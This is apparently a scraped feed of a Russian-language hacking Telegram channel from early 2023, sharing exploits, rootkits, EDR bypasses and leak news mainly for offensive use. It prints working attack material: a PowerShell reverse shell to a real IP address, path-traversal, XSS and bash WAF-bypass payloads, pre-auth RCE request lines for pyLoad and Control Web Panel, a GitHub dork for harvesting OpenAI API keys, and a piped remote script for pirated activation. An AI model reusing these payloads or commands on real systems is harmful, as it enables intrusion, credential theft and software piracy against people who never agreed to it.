хм 🧐https://exploit.in/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fexploit.in%2F2005%2F193%2F&format=xml |
|
2023-03-29 10:31:05 |
None |
Images
|
2023-03-28 16:40:06 |
Рубрика: Нам пишутCaveCarverPE backdooring tool which utilizes and automates code cave technique #backdoor #PE |
Images
|
2023-03-28 16:30:55 |
github dork to find openai api key/"sk-[a-zA-Z0-9]{20,50}"/ |
Images
|
2023-03-28 04:53:30 |
Вдруг вам нужно403-bypass.pybypass-403.sh B1pass3r#403 |
|
2023-03-26 10:21:16 |
ChatGPT for CyberSecurityPDF |
Images
|
2023-03-26 06:45:24 |
Chaos-Rootkitx64 ring0 windows rootkitdownload#rootkit #windows #ring0 |
Images
|
2023-03-25 07:44:47 |
None |
|
2023-03-25 07:44:46 |
None |
Images
|
2023-03-25 07:44:45 |
Бывает полезно скрыть ip через hex/decimal преобразованиеwindows\linux\browser - работает везде*вот вам 2 варианта, и bash и powershell |
|
2023-03-24 17:45:34 |
Время добрых дел.Многие знают, есть такой клёвый юзер xss.is yashechkaОн генерирует тонны крайне полезного хакерского контента, переводит западный контент, записывает ролики (в том числе и обучающие), лепит красивые pdf - и все это в 99.9 % бесплатно и для людей.Но случилась беда. И yashechka вот вот останется без глаз, в прямом смысле слова. Зрение yashechka терял давно, болезнь прогрессирует и сейчас на стадии "еще немного и глаза откажут". Все это крайне страшно и этого хотелось бы избежать. Поэтому yashechka всё таки смог написать пост на xss.is с призывом о помощи:S.M.E. - Прошу руку помощи у форумчанТам Вы найдете историю как так вышло, как он остался без работы потому что ослеп, как болезнь прогрессирует и реквизиты по которым можно оказать помощь.*Наш канал не пройдет мимо и тоже окажет помощь. |
Images
|
2023-03-24 05:49:59 |
CVE-2023-27532Да, опять Veeam Backup & Replication Утечка учёток в виде открытого текста, либо выполнение удаленного выполнения команды.*Аналитика*POC exploit*usage:VeeamHax.exe --target 192.168.0.100 илиVeeamHax.exe --target 192.168.0.100 --cmd calc.exe#veeam #rce #leakPass |
Images
Images
|
2023-03-23 05:28:39 |
kernel-linux-factory*Удобно тем, что не нужно компилировать или настраивать среду, глянул какое ядро, запустил сплоет, получил по морде #root*в составе exploits для:CVE-2016-97934-20-BPF-integerCVE-2017-5123CVE-2017-6074CVE-2017-7308CVE-2017-8890CVE-2017-11176CVE-2017-16995CVE-2017-1000112CVE-2018-5333CVE-2019-9213 & CVE-2019-8956CVE-2019-15666CVE-2020-8835CVE-2020-27194CVE-2021-3156CVE-2021-31440CVE-2021-3490CVE-2021-22555CVE-2021-41073CVE-2021-4154CVE-2021-42008CVE-2021-43267CVE-2022-0185CVE-2022-0847CVE-2022-0995CVE-2022-1015CVE-2022-2588CVE-2022-2639CVE-2022-25636CVE-2022-27666CVE-2022-32250CVE-2022-34918download#linux #exploits #kernel |
|
2023-03-22 20:33:43 |
pic of day |
Images
|
2023-03-20 19:19:16 |
bypass for the FortiWeb (Fortinet) WAFusage:"><iframe src=//14.rs>то есть вместо стандартной полезной нагрузки XSS для выполнения js |
Images
|
2023-03-20 18:47:47 |
Рубрика нам пишутBlack Angel is a Windows 11/10 x64 kernel mode rootkit. Rootkit can be loaded with enabled DSE while maintaining its full functionality. link |
Images
|
2023-03-19 18:29:46 |
UAC bypass for x64 Windows 7 - 11Понятно iscsicpl.exe уязвим к перехвату порядка поиска DLL при запуске 32-битного бинарного файла Microsoft на 64-битном хосте через SysWOW64. |
Images
|
2023-03-19 18:19:16 |
Laravel FrameworkPayload: //////////////////../../../../../../../../etc/passwd |
Images
|
2023-03-18 22:09:59 |
PowerShell открывает TCP-сокет на удаленном сервере и выполняет ввод в виде команды, отправляя вывод обратно. Тупо бэкдор!usage:powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('106.12.252.10',6666);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" |
|
2023-03-10 18:48:36 |
полезные нагрузки подъехалиpayloads |
Images
|
2023-03-10 18:29:50 |
Круто !!! old school sniffing RJ45берем крокодильчикицепляем на витухупогналиVideo |
Images
|
2023-03-09 14:54:58 |
🧐 |
Images
|
2023-03-09 11:56:52 |
Offline создание администратора Windows 10? 😈ОгаВсё через встроенные DLL-файлы offlinelsa и offlinesam. Официально, но не очень документировано.OfflineAddAdmin2 (это новая версия)Видео туториал |
Images
|
2023-03-09 04:54:56 |
CVE-2023-21768 Local Privilege EscalationWindows 11 22H2POC exploit *usage:Windows_AFD_LPE_CVE-2023-21768.exe <pid>где <pid> это id процесса который нужно повысить до system#windows #lpe |
|
2023-03-08 05:51:12 |
0-CLICK Microsoft Word RCE exploitCVE-2023-21716 PythonPoC (take 2) open("t3zt.rtf","wb").write(("{\\rtf1{\n{\\fonttbl" + "".join([ ("{\\f%dA;}\n" % i) for i in range(0,32761) ]) + "}\n{\\rtlch no crash??}\n}}\n").encode('utf-8')) |
|
2023-03-07 20:41:48 |
8 марта вот вот настанет ! 😊Поддержим проект ?)BTC bc1qe8vmnxeqftjj7qynq8ljyv564j44wqaww8sa82XMR 43rmbgj7gy8fwAzuqWNNAbL3K3Eb54khZhY36gkRM8Vv6EVvEQFvSMBEhGyQDY43DWfEsbBY6msmR3GRGt4cC49yVs2jc8k#праздник |
|
2023-03-07 19:14:12 |
pic of day |
Images
|
2023-03-07 11:58:34 |
BurpSuite* man\tutorВдруг вы забыли |
Images
|
2023-03-05 20:50:14 |
Внимание !через 10 минут опять понедельник.Вот вам rootkit dog😎 |
|
2023-03-05 08:02:55 |
использование setuid dos2unix позволяет выполнять запись произвольного файла от имени пользователя root. |
Images
|
2023-03-04 05:12:06 |
RemoteShellcodeExecВыполнение шелл-кода из удаленного bin-файла с помощью Winhttp.Shellcodes are dead, long live fileless shellcodes.*Пока что 0/26 detectionsdownload |
Images
|
2023-03-03 04:49:59 |
Нужно больше жира))))) Analyzing a Python Malware Part 2 |
Images
|
2023-03-02 16:03:45 |
None |
|
2023-03-02 05:02:56 |
Titan stealer и его панель (C2Panel) жирно палитсяThreatFox Database |
Images
Images
|
2023-03-01 18:56:12 |
bash injection bypass waf $0<<<$\'\\$(($((1<<1))#10011010))\\$(($((1<<1))#10100011))\' |
Images
|
2023-02-27 18:32:12 |
Lazarus-Tactic (APT38)*Можно написать 0day, а можно регулярно воровать 0days у трудолюбивых исследователей безопасности. Именно этим (ну не только) и занимались ребята из APT38, заражая Visual Studio (vcxproj).В общем такой 0day-stealer**После запуска программа заразит все ваши проекты Visual Studio** |
|
2023-02-26 14:03:52 |
TCP Data Transfer Tool Прикольно конечно в кернелМемори писать гадости\радости всякие.В общем получается почти !!! fileless attack, техника не новая и что там с runtime детектами не понятно, но все равно интересно.Скачать бесплатно и без смс уникальный крест доминика торето сделанный из легендарной финки нквд можно только на джойказино, мать его. |
|
2023-02-26 07:11:56 |
bootlickerУстаревший (?) расширяемый руткит прошивки UEFI, предназначенный для виртуальных машин гипервизора vmware. Он предназначен для выполнения начального кода в контексте ядра Windows, независимо от настроенных параметров безопасности.*vmvware-bootkit основан на устаревших руткитах CosmicStrain, MoonBounce и ESPECTRE, что позволяет выполнять произвольное выполнение кода без срабатывания patchguard*Download bootlicker#rootkit #bootkit |
|
2023-02-24 12:07:37 |
OpenSSH 9.1 exploit and mass scan*Уязвимость CVE-2023-25136 влияет на процесс предварительной аутентификации SSH. Используя его, атакующий может повредить память и выполнить произвольный код на машине без аутентификации на целевом сервере.download exploit and mass scan#ssh #exploit #scanner |
|
2023-02-23 11:33:48 |
Уполномоченный руководитель субъекта КИИ теперь ответственный, а заниматься защитой объекта можно без высшего образования — достаточно среднего. ФСТЭК внесла изменения в стандарты.Яяяяяяяяяяяяяяяяяяяяяяяясно блеать, можно продолжать платить по студенческим расценкам !Тем временем:#СкребемПоКиберСусекам |
|
2023-02-22 16:11:10 |
Ударим ГовноПарсером lsass по приближающимся выходным !download this shit (вас блин предупреждали) |
|
2023-02-22 07:07:06 |
Weblogic-CVE-2023-21839*Affected version12.2.1.3.012.2.1.4.014.1.1.0.0POCUsage POC:java -jar target ip: адрес порта ldap |
|
2023-02-22 06:59:38 |
Давайте создадим расширение для Chrome, которое крадет ВСЁ*Ключевые правила:1.Пользователь не должен знать, что за кулисами что-то происходит.2.Не должно быть никаких визуальных признаков того, что что-то не так.3.Никаких дополнительных консольных сообщений, предупреждений или ошибок.4. Нет дополнительных предупреждений браузера или диалогов разрешений.5.Нет дополнительного сетевого трафика на уровне страниц.*В итоге мы воруем: - Cookies - History - Screenshots - User Navigation - Page Traffic - Keylogger - Input Capturing - Clipboard Capturing - Capturing Geolocation - Stealth Tab *Залить все это в Chrome Web Store конечно нереально))) А вот залить через GPO ... в общем дальше сами )spy-chrome-extension#chrome #extension |
|
2023-02-21 14:43:33 |
CVE-2022-39952 Fortinet FortiNAC CVSS score of 9.8Продукты, затронутые уязвимостью: FortiNAC version 9.4.0 FortiNAC version 9.2.0 through 9.2.5 FortiNAC version 9.1.0 through 9.1.7 FortiNAC 8.8 all versions FortiNAC 8.7 all versions FortiNAC 8.6 all versions FortiNAC 8.5 all versions, and FortiNAC 8.3 all versionsPOC exploit#forti #poc |
|
2023-02-20 07:09:19 |
HIVEМы продолжаем следить за наработками @c4s73r и сегодня он зарелизил HIVE.В личной переписке он сознался что - смотреть скриншотVLAN L2 Pivoting Instrument#network #hacking |
|
2023-02-18 11:00:31 |
Привет) |
|
2023-02-17 04:51:18 |
CVE-2023-23752Joomla webservice endpoint accessPoChttpx -l ip.txt -path '/api/index.php/v1/config/application?public=true' |
|
2023-02-16 18:29:01 |
CVE-2022-44666WriteUp по одной забытой уязвимости Windows (0day): выход атрибута href управления системной ссылкой Microsoft Windows Contacts (VCF/Contact/LDAP), который не был полностью исправлен как CVE-2022-44666 в исправлениях, выпущенных в декабре 2022 года. А значит, жир еще впереди.POC в наличииGo#win #poc #vuln |
|
2023-02-16 18:20:57 |
Ну VirusTotal как C2 уже былGithub as C2 почему бы и нет )Get#C2 |
|
2023-02-16 13:45:33 |
SSH-Remote-Code-Executionхммммм 🤨 |
|
2023-02-16 04:48:32 |
Вдруг вам нужноBurp Suite Certified Practitioner Exam Study |
|
2023-02-15 10:10:44 |
Рекомендовано всем к прочтениюлинк xss.is |
|
2023-02-13 18:51:19 |
RCE in Western Digital PR4100 NASspeech_exploit_patch |
|
2023-02-13 18:28:38 |
Windows LPE via StorSvcdownload |
|
2023-02-13 18:26:25 |
Драсти |
|
2023-02-11 12:18:21 |
BokuLoaderРасширяем возможности уклоненийBokuLoader - Cobalt Strike Reflective Loader |
|
2023-02-10 11:39:00 |
Извините, но пятничное ) |
|
2023-02-10 04:34:18 |
DEUS X64 |
|
2023-02-09 04:52:45 |
CVE-2023-25136 - OpenSSH - Pre-Auth Double FreeWriteupPoC - вызывает DOS серванта |
|
2023-02-08 18:29:35 |
backdoor и shellCode билдер под разные архитектуры (0x001)hackebds#shellcode #backdoor #arch |
|
2023-02-08 18:19:07 |
UnhookingPatchОпять byPass опять EDRПюрешка с котлеткой#win #edr |
|
2023-02-08 10:05:02 |
NetworkNightmareВеликолепный Магама AKA @c4s73r в рамках сетевого беспредела опубликовал свои труды на благословенной гитхабе.С чем поздравляем и поддерживаем ! 😜NetworkNightmare#подрывУстоев #network |
|
2023-02-08 04:43:03 |
LFI |
|
2023-02-07 05:17:33 |
exploit для активно эксплуатируемой уязвимости нулевого дня, затрагивающий консоли администрирования GoAnywhere MFT.readshodan - total 1000exploit |
|
2023-02-06 16:20:44 |
Лол))))) SSRF |
|
2023-02-06 15:45:05 |
Nidhogg rootkitВиндовый rootkit написанный на C++, по заявлению авторов сильно дружит с любыми версиями win 10 и win 11. Так же руткит можно примотать синей изолентой к своему C&C и долго медитировать на бегущий трафик.Скачать тут#rootkit #windows #redteam |
|
2023-02-06 15:24:21 |
Картоха ! from Service to SYSTEMRasmanPotatodownload#windows #priv |
|
2023-02-06 13:11:51 |
CVE-2022-44268Arbitrary File Read PoC - PNG generatorPoC |
|
2023-02-06 09:48:19 |
BypassAVкарта с основными методами обхода антивируса и EDR.MAP |
|
2023-02-05 07:00:54 |
DevOps игры (в рамках эксперимента воскресенья)*devops.gamesdevopspartygamesoverthewire (linux war games)ohmyGITcodingame |
|
2023-02-05 06:06:59 |
SCRIPT HTTP-SQL-INJECTION (NMAP)download |
|
2023-02-04 16:36:09 |
BurpSuiteSharpenerdownload |
|
2023-02-04 10:21:12 |
CVE-2023-25135vBulletin - RCE + exploitman+exploit#exploit #vBulletin |
|
2023-02-04 08:55:30 |
RATникиВчера мы говорили про мартицы C&C серверов\фреймворковА сегодня про матрицу RATТут хватит всем #rat |
|
2023-02-04 08:47:58 |
CVE-2023-0045Bypassing Spectre-BTI User Space Mitigations on Linux |
|
2023-02-04 07:21:24 |
Acunetix Premium v15.3.230123162_Win x64+crack |
|
2023-02-03 21:27:46 |
NTDLLReflectionОбход перехватчиков EDR Userland путем загрузки Reflective Ntdll в память с удаленного сервера на основе Windows ReleaseID, чтобы избежать открытия дескриптора для ntdll и активировать экспортированные API-интерфейсы из таблицы экспорта.*В общем очередной (свежий) ByPassdownload#windows #bypass |
|
2023-02-03 16:34:34 |
CobaltStrike ? НЕТ !Тут хватит всемВпрочем об альтернативах мы уже писали несколько раз#C2 #c&c |
|
2023-02-03 03:42:01 |
IBM Aspera Faspex - Pre-Auth RCE+ exploit coderead and run |
|
2023-02-02 20:04:27 |
Я просто оставлю это здесь - ЫТЬ CVE-2022-44268 POC |
|
2023-02-02 16:31:02 |
CVE-2023-21608 - RCE - Adobe Acrobat ReaderVideo proofpass: proxy_bar#exploit #rce #acrobat |
|
2023-02-02 09:37:51 |
Художественный фильм "спиз.." "golden certificates"*certsync - это новая техника для удаленного дампа NTDS, но на этот раз без DRUAPI: он использует золотой сертификат и UnPAC хеш. * domain admin - не нужен, хватит и CA admindownload#windows #cert |
|
2023-02-02 05:27:00 |
RedTeam-ToolsИнструменты и техники для Red TeamИмеровover 100 toolsdownload#red #pentest #tools #man |
|
2023-02-01 04:52:25 |
PassTheCertаутентификация на сервере LDAP/S с сертификатом через SchannelПока в виде концепта, но уже интересно |
|
2023-02-01 04:33:26 |
CVE-2023-23924 библиотека Dompdf - RCECVSS score: 10 !!!Конкретнее о дырке тут#php #vuln #poc |
|
2023-01-31 16:30:16 |
exploit for VMware vRealize Log InsightTechnical Deep Divedownload EXPLOIT#exploit #vmware |
|
2023-01-31 04:59:22 |
D1rkLrd - свежее1 - Shellcode Loader with Indirect Dynamic syscall Implementation2 - shellcode in MAC format3 - API resolving from PEB4 - Syscall calll and syscall instruction address resolving at run timedownload#windows #shellcode |
|
2023-01-31 04:47:53 |
CVE-2022-25765 - PDFkit-CMD-InjectionПодробности дырки тутexploit#exploit |
|
2023-01-31 04:36:55 |
УтрыDecompiler Explorer |
|
2023-01-30 15:12:16 |
Tangled WinExecКрайне интересно, загляните в папку ReflectiveDLLInjectionпосмотреть |
|
2023-01-30 13:34:05 |
BypassCredGuardОбход Credential Guard через исправление памяти Wdigestdownload#windows #bypass |
|
2023-01-29 19:59:11 |
MyBB 1.8.32 - Chained LFI Remote Code Execution (RCE) (Authenticated)exploit#myBB |
|
2023-01-29 17:37:26 |
Может лучше не ставить этот ваш windows 11 ?Скоро придется компьютер клеткой Фарадея накрывать, а вместо инета - юзать диод данных. *Ну так вот, объемный гайд по ОТКЛЮЧЕНИЮ ТЕЛЕМЕТРИИ и всякого зла от мелкомягких.*Windows 11 Debloat / Privacy Guide |
|
2023-01-29 12:08:58 |
PHP Development Server <= 7.4.21 - Remote Source Disclosureread#php #vuln |
|
2023-01-29 10:59:43 |
Exploit for full access to disk C:\ (for all users) pass: proxy_bardownload#exploit #C #windows |
|
2023-01-29 08:28:56 |
Invicti 2023 + REG file (бывший NetSparker)*archive Pass: proxy_bar |
|
2023-01-28 21:09:09 |
sshd_backdoor*/root/.ssh/authorized_keys evil file watchdog with ebpf tracepoint hook. Прикольно, а я все по старинке PAM модули прописываю, да и руткиты под *nix тем же занимаются.download#ssh #bckdoor |
|
2023-01-28 08:49:33 |
Будьте бдительны, скамеры не спят |
|
2023-01-28 06:00:00 |
Kali-PurpleThe ultimate SOC-in-a-box community project*1. Practice Ops: Virtualization, firewalls, VLAN, WAF, SIEM, IDS/IPS, ...2. Practice Red: Penetration testing of vulnerable machines while seeing what the blue team sees. 3. 3. Can you become stealthier?4. Practice Blue: Firewall and IPS rules, SIEM analysis and dashboard development, ...5. Purple teaming: Red and Blue working together to develop the ultimate set of rules6. Protect: Deploy Kali-Purple to protect your networkdownload |
|
2023-01-27 19:16:44 |
Пост восхваления хакера Raptor (ака Marco Ivaldi)Нужно отдать должное, как никак человек жизнь положил на алтарь exploit research.Ознакомьтесь с его github/0xdea и сплоитами которые он писал больше 20 лет - всегда бывает полезно глянуть в историю.#deadcow |
|
2023-01-27 05:06:23 |
cat /etc/passwd16bit format{\c''\a""t,/e''*?/?a?s??}или{\c''\a""\t,/\e''*?/\p*\d} |
|
2023-01-26 16:48:31 |
Слово "консультант" - предполагает под собой отказ от ответственности ? )))😁 |
|
2023-01-26 14:21:26 |
CVE-2022-34689Windows CryptoAPI spoofing vulnerability.Дырку в сыре обнаружили АНБ и NCSC Великобритании, она позволяет подделывать сертификаты коллизии MD5 и вообще манипуляции с сертификатом x.509. Exploit#windows #x509 |
|
2023-01-26 04:44:37 |
Yandex Git repository leaked *Несколько часов опубликовали 40Gb+ протекшего GIT-репозитория Яндекса.а именно:aapi.tar.bz2admins.tar.bz2ads.tar.bz2alice.tar.bz2analytics.tar.bz2antiadblock.tar.bz2antirobot.tar.bz2autocheck.tar.bz2balancer.tar.bz2billing.tar.bz2bindings.tar.bz2captcha.tar.bz2cdn.tar.bz2certs.tar.bz2ci.tar.bz2classifieds.tar.bz2client_analytics.tar.bz2client_method.tar.bz2cloud.tar.bz2commerce.tar.bz2connect.tar.bz2crm.tar.bz2crypta.tar.bz2customer_service.tar.bz2datacloud.tar.bz2delivery.tar.bz2direct.tar.bz2disk.tar.bz2docs.tar.bz2drive.tar.bz2extsearch.tar.bz2fuzzing.tar.bz2gencfg.tar.bz2groups.tar.bz2helpdesk.tar.bz2infra.tar.bz2intranet.tar.bz2investors.tar.bz2it-office.tar.bz2jupytercloud.tar.bz2kernel.tar.bz2library.tar.bz2load.tar.bz2mail.tar.bz2maps.tar.bz2maps_2.tar.bz2maps_adv.tar.bz2market.tar.bz2metrika.tar.bz2mobile-WARNING-notfull.tar.bz2nginx.tar.bz2noc.tar.bz2partner.tar.bz2passport.tar.bz2pay.tar.bz2payplatform.tar.bz2paysys.tar.bz2portal.tar.bz2robot.tar.bz2rt-research.tar.bz2saas.tar.bz2sandbox.tar.bz2search.tar.bz2security.tar.bz2skynet.tar.bz2smart_devices.tar.bz2smarttv.tar.bz2solomon.tar.bz2stocks.tar.bz2tasklet.tar.bz2taxi.tar.bz2tools.tar.bz2travel.tar.bz2wmconsole.tar.bz2yandex_io.tar.bz2yandex360.tar.bz2yaphone.tar.bz2yawe.tar.bz2frontend.tar.bz2 |
|
2023-01-25 15:23:50 |
CVE-2023-23504 - Apple products*Протекает dlil.c XNU который обрабатывает сетевые интерфейсы, вызванный целочисленным переполнением (uint16_t) в if.c. Всего лишь надо то создать 65536 сетевых интерфейсов. |
|
2023-01-24 13:59:48 |
Фу, блин, Но POC есть POC CVE-2023-22960Обод механизма предотвращения подбора учетных данных встроенного веб-сервера (интерфейса) более чем 60 моделей принтеров Lexmark.*Фор Даунлоаде зысис щит, фолоу ту зэ линк, май френд |
|
2023-01-23 09:00:31 |
LPE - Solaris 10Злоупотребление в dtprintinfo*Есть такой ресёрчер Marco Ivaldi (дохлая корова) который шлепает сплоиты с бородатого 2000 года, хоть соляру сейчас найти сложно, но все равно красивоexploit |
|
2023-01-22 12:19:03 |
Это может быть интересноADReplStatus*Active Directory Replication Status Tool, aka ADREPLSTATUS - 2023download |
|
2023-01-22 11:45:38 |
For BurpSuiteAPIKit:Discovery, Scan and Audit APIs Toolkit All In One.download#Burp #plugins |
|
2023-01-22 11:17:58 |
SugarCRM 0-day Auth Bypass + RCE Exploit |
|
2023-01-22 09:13:28 |
CVE-2023-0398 modoboa - mail ServerCSRF приводит к удалению домена*usage fot BURP:<html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="http://127.0.0.1:8000/admin/domains/4/delete/"> <input type="submit" value="Submit request" /> </form> <script> document.forms[0].submit(); </script> </body></html>read |
|
2023-01-21 13:38:56 |
переоформим ! |
|
2023-01-21 13:17:38 |
CVE-2023-0179 PoCэксплойт для уязвимости в Nftables, затрагивающий все версии Linux от 5.5 до 6.2-rc3, хотя эксплойт тестировался на свежем ядре 6.1.6Понять глубину#linux #kernel #lpe #nftables |
|
2023-01-21 11:11:28 |
Microsoft Teams - RCEdownload |
|
2023-01-21 08:15:18 |
Коннектимся! |
|
2023-01-21 05:34:17 |
RDPAsynchronous RDP client for Python (headless) *Ну Вы понимаете, да ? )))подобрать |
|
2023-01-20 17:03:12 |
Если я пойду и долиною смертной тени, не убоюсь зла, потому что Ты со мной openAI;Твой жезл и Твой посох - они успокаивают меня. Ты приготовил предо мною трапезу в виду врагов моих; умастил елеем голову мою; чаша моя преисполнена.BOT off как вы поняли |
|
2023-01-20 14:35:30 |
Wolfenstein 3D CGAТут и описание то не нужно. забрать#wolf #90 |
|
2023-01-20 05:22:32 |
В продолжении темыПоявился nuclei-template для дыры CVE-2022-47966.yamlНу и сам nuclei забрать тут****Bonus для blueTeam - правило обнаружения эксплуатации дыры для Sigma - забрать |
|
2023-01-19 19:37:32 |
Exploiting null-dereferences in the Linux kernel Интересное#linux #kernel |
|
2023-01-19 18:50:00 |
SUDO KILLERТулза для выявления и использования неправильных конфигураций и уязвимостей правил sudo для повышения привилегий Linux.download |
|
2023-01-19 16:23:57 |
Чаты и каналы Telegram по информационной безопасности 2023 Хорошая подборочка over 100, но нас в ней нет ((Забираем |
|
2023-01-19 14:43:56 |
CVE-2022-47966*Список ПО от ManageEngine подверженных атаке поражает !* Уязвимость позволяет удаленное выполнение кода, отправив HTTP-запрос POST, содержащий вредоносный ответ SAML. А всё из за не патченной версии Apache Santuario для проверки подписи XML.*read*POC/exploit*Usage:python3 CVE-2022-47966.py --url https://10.0.40.64:8080/SamlResponseServlet --command notepad.exe |
|
2023-01-19 08:44:14 |
CVE-2023-22809 - опять Sudo, опять bypass😏#Unix #linux #sudo #bypass |
|
2023-01-18 11:38:40 |
NGINXConfigСамый простой способ настроить производительный, безопасный и стабильный NGINX сервер.Ну вдруг вам нужно, натыкали галочек, получили конфиг.НаТыкать#nginx |
|
2023-01-18 04:35:35 |
CVE-2022-46463 Проблема контроля доступа в Harbour v1.X.X–v2.5.3 позволяет злоумышленникам получать доступ к общедоступным и частным репозиториям без аутентификации.Вообще Харбор крутая штука, для devops\devsecopsexploit#harbor #repo |
|
2023-01-17 12:35:40 |
ОТСТАВИТЬ ПАНИКУБОТ был и останется бесплатным.Сейчас тестируются новые фичи. К вечеру все будет доступно в одном из двух вариантов:1. Допуск по телеграмм id для всех желающихили2. Допуск как и раньше, но с таймаутом сообщений в 30 сек3. симбиоз первого и второго варианта |
|
2023-01-17 09:42:13 |
CVE-2023-0297Pre-auth RCE in pyLoadreadExploit Code:curl -i -s -k -X $'POST' \ --data-binary $'jk=pyimport%20os;os.system(\"touch%20/tmp/pwnd\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' \ $'http://<target>/flash/addcrypted2' |
|
2023-01-17 09:22:32 |
Windows Kernel Elevation of Privilege Vulnerability.CVE-2022-21881cve-2022-21881-io_completion-poc.cpp |
|
2023-01-16 16:41:53 |
ChatGPT - для RedTeam и BlueTeamГодная статья с хорошими примерами Читать OpenAI ChatGPT for Cyber SecurityЕсли нет учетки OpenAI - попробовать свои силы можно в нашем боте#openAI |
|
2023-01-15 05:22:05 |
Cellebrite & MSABДанные от Cellebrite и MSAB, двух компаний, которые предоставляют правительствам инструменты для взлома телефонов, были слиты.*Утечка включает в себя фактическое программное обеспечение, а также документацию.*Эти инструменты использовались против журналистов, активистов и диссидентов по всему миру. |
|
2023-01-15 04:33:49 |
next generation Firewall - а главное, надежный 😜 |
|
2023-01-14 07:32:22 |
chatGPT openAIпока в режиме тестаproxy_bar_openAI_bot#openAI #chatGPT #skynet |
|
2023-01-14 05:04:20 |
ExplorerPersistперехват загрузки cscapi.dll и как итог - внедрение "нашей" dll с "нашим" функционалом.Ну а Persistence в том что отрабатывает каждый раз при запуске проводникаdownload |
|
2023-01-13 11:57:53 |
Сжато, ёмко, всеобъемлюще, БАЗА !!!))))Для этих гребаных web-мастеров - motherfuckingwebsite.comЭтому не научат на курсахЧто то даже БаШорг вспомнился версии 2004 года....#humor #web #lol |
|
2023-01-13 09:53:55 |
охх))) RecycleBin снова в деле ! ) RecyclePersist |
|
2023-01-13 09:00:18 |
Новость по утечке в mail.ru - шляпа.И ничего полезного в ней нет. Разве что чисто на прозвон3505917 строк |
|
2023-01-13 04:43:48 |
CVE-2022-3656*Затронуто более 2,5 миллиардов пользователей Google Chrome и браузеров на базе Chromium.Эта уязвимость позволяет украсть конфиденциальные файлы, такие как зашифрованные кошельки и учетные данные облачного провайдера. |
|
2023-01-12 05:09:08 |
CVE-2023-21752Свежайшая Дыра (от 10 января) в службе резервного копирования WindowsLPE от юзера до системыAbout vulnexploit#windows #exploit #lpe |
|
2023-01-11 18:14:45 |
CVE-2023-0210В новый год, с новыми дырамиFlaw in Linux Kernel Allows Unauthenticated remote DOS AttacksPOC - ручками наберете#linux #kernel |
|
2023-01-11 17:53:04 |
Списки docker образов для прокачки Пентестаfor pentesterts |
|
2023-01-11 05:33:46 |
Активация windows и officeБыстрый способ без всяких KMS_autousage:PowerShell от админа и вставляем:irm https://massgrave.dev/get | iex и выбираем нужный пункт, ВСЁили такНу мало ли Вам нужно. |
|
2023-01-11 05:05:42 |
Exploit for CVE-2022-20452 privilege escalation on Android from installed app to system app (or another app)downLoad#android #exploit |
|
2023-01-10 12:50:56 |
ChatGPT Ultimate Resource Guide WoW |
|
2023-01-10 10:40:34 |
Атаки на банкоматы с использованием вредоносного ПОAzaZAвсе как вы любите |
|
2023-01-10 10:35:07 |
Chrome-V8 RCEexploit |
|
2023-01-10 05:03:27 |
ChatGPT_PoC - продолжаем наблюдение ))))#openAI |
|
2023-01-10 04:37:59 |
CVE-2022-31705POCGeekpwn 2022 Vmware EHCI OOBdownload |
|
2023-01-09 13:00:00 |
CVE-2022-41076The OWASSRF + TabShell exploit chaintabshell_poc.ps1 |
|
2023-01-09 11:05:21 |
Kerberos attacks 1-Kerberoasting AzaZa#Kerberos |
|
2023-01-08 17:17:57 |
CVE-2022-44877Control Web Panel Unauth RCEPOC usage:POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.{{interactsh-url}}) HTTP/1.1Host: vulnContent-Type: application/x-www-form-urlencodedusername=root&password=toor&commit=Login |
|
2023-01-08 11:20:47 |
Расходимся, мы тут лишниечитать всю статью |
|
2023-01-08 09:28:55 |
Malware Analysis Series (MAS): Article 7Опа, седьмая часть вышла !PDF#malware #destroy #happy |
|
2023-01-08 05:34:03 |
FilelessNtdllReflectionЕще один Bypass Userland EDRdownload#bypassEDR |
|
2023-01-07 06:40:03 |
ААА сука, в голосину)))))))))))))))Linux find Windows 10/11 OEM product key command*Был ноут с windows, поставили linux, но ключ от винды хотим "подарить" ?)))sudo cat /sys/firmware/acpi/tables/MSDM | tail -1Смешное |
|
2023-01-07 06:31:29 |
UnhookingPatchBypass EDR download |
|
2023-01-06 17:09:37 |
Ребята, всем привет !!!!Прошел НОВЫЙ ГОД и вот вот наступит рождество !!!А это значит что PROXY_BAR всех Вас поздравляет, желает удачи, здоровья и взлома без последствий )))))В общем с праздниками ВАС )))))*****Ну и если Вам нравится то что мы делаем, Вы можете нас поддержатьBitcoin bc1qe8vmnxeqftjj7qynq8ljyv564j44wqaww8sa82Ethereum 0xa9626b33E39d904b6A48640cA89295323E7402A9Monero 43rmbgj7gy8fwAzuqWNNAbL3K3Eb54khZhY36gkRM8Vv6EVvEQFvSMBEhGyQDY43DWfEsbBY6msmR3GRGt4cC49yVs2jc8k |
|
2023-01-06 15:05:21 |
PhpMyAdmin Setup - доступен без аутентификации )))****1. ищем хосты через shodan и censys2. все IP сканим на на ниличие службы ПХПмайАдмин3. wappalyzer покажет php, лучше использовать php.txt 4. phpMyAdmin/setup найден )) |
|
2023-01-06 07:10:07 |
CVE-2022-44877Centos Web Panel 7 Unauthenticated Remote Code Executiondownload#centos #rce |
|
2023-01-06 05:08:50 |
OFFENSIVE SECURITY & REVERSE ENGINEERING (OSRE) Coursedownload |
|
2023-01-05 20:15:02 |
Alcatrazдвоичный обфускатор под x64, способный запутывать различные PE-файлы, включая:.exe.dll.sysdownload |
|
2023-01-05 12:25:55 |
Shellcode MutatorПрячемся от сигнатур !downloadusage:mutate.py [-h] [-t SHELLCODE_TEMPLATE] [-s SHELLCODE_FILE] [-m MORPH_PERCENTAGE] [-v] [-x86]#shellcode #Morphin |
|
2023-01-05 10:06:47 |
Casper-fs Это генератор пользовательских скрытых модулей ядра Linux. Каждый модуль работает в файловой системе для защиты и сокрытия секретных файлов. Понимаете ?)))*download*video |
|
2023-01-04 19:26:04 |
